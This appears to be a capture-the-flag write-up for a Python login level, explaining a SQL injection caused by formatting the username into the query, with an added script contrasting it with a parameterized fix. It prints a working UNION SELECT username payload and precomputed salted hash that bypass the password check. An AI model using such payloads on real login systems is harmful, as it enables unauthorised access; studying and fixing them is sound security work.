Here is a Python level. It is claimed to be more secure than the previous one, and it is a bit, but not really.
There is really no hint given other than in the code.
So take a look at line #86
query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username) cursor.execute(query)
So that takes the submitted username and pulls out the row needed to check whether the user/password combination is correct. The main issue is that the username is formatted straight into the query string with no validation or escaping, so anything typed into it, such as a quote, becomes part of the SQL.
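The vulnerable pattern above next to its parameterized fix, as an added example that is not the level's code. It builds a constructed in-memory users table (sample user, password and salt are made up; the sha256(password + salt) ordering is an assumption, since the level's hashing code is not shown) and demonstrates the tell-tale symptom of the bug, a username containing a quote breaking the query, which the hardened version simply treats as data:

```python
import hashlib
import hmac
import sqlite3

# Constructed stand-in for the level's users table (sample data, not the level's own).
USERNAME, PASSWORD, SALT = "alice", "correct horse", "n0tr4nd0m"

def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password_hash TEXT, salt TEXT)")
    # Assumed hashing scheme: sha256(password + salt); the level's exact order is not shown.
    pw_hash = hashlib.sha256((PASSWORD + SALT).encode()).hexdigest()
    conn.execute("INSERT INTO users (username, password_hash, salt) VALUES (?, ?, ?)",
                 (USERNAME, pw_hash, SALT))
    conn.commit()
    return conn

def lookup_unsafe(conn, username):
    # The level's pattern: the username is spliced into the SQL text, so a quote
    # in it ends the string literal and everything after it is parsed as SQL.
    query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username)
    return conn.execute(query).fetchone()

def lookup_safe(conn, username):
    # Hardened form: a bound parameter is always data, never SQL, whatever it contains.
    query = "SELECT id, password_hash, salt FROM users WHERE username = ? LIMIT 1"
    return conn.execute(query, (username,)).fetchone()

def check_login(conn, username, password, lookup=lookup_safe):
    row = lookup(conn, username)
    if row is None:
        return False
    _, stored_hash, salt = row
    candidate = hashlib.sha256((password + salt).encode()).hexdigest()
    # Constant-time comparison so the check does not leak how many bytes matched.
    return hmac.compare_digest(candidate, stored_hash)

def probe_quote(conn, lookup):
    """Return 'error' if a username containing a quote breaks the query, else 'ok'.
    A stray quote blowing up the query is the symptom the writeup points at."""
    try:
        lookup(conn, "O'Brien")
        return "ok"
    except sqlite3.OperationalError:
        return "error"

if __name__ == "__main__":
    conn = build_db()
    print("unsafe lookup with a quote:", probe_quote(conn, lookup_unsafe))  # error
    print("safe lookup with a quote:  ", probe_quote(conn, lookup_safe))    # ok
    print("real login:", check_login(conn, USERNAME, PASSWORD))             # True
```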
So we are going to attack this with SQL injection. Since nothing validates the username, we can put SQL into it and make the query return data we choose, using a UNION. The idea is to UNION in a row we supply so that it takes the place of the row the database would otherwise return. First we need a salted password hash to use, so fire up python and do something like this:
import hashlib
hashlib.sha256(b"bob" + b"bob")
hashlib.sha256(b"bob" + b"bob").hexdigest()
'4c26991843b5498e99ef26e6cf45c4eecd9e6890436f619054aaa8790b35967c'
What we are doing is creating our own salted password hash to pass in via the SQL injection, so that the app compares it against the password we submit in the form and the salt we also inject. Once we have that hash and its known salt/password pair, we enter the following:
As the username
' UNION SELECT id, '4c26991843b5498e99ef26e6cf45c4eecd9e6890436f619054aaa8790b35967c' AS password_hash, 'bob' AS salt FROM users where username='bob';--
As the password
bob
That makes the query return our id, password_hash and salt in place of what the database would return when selecting the user bob, so the app's check is run against the hash and salt we supplied.
Now you have the next level’s password.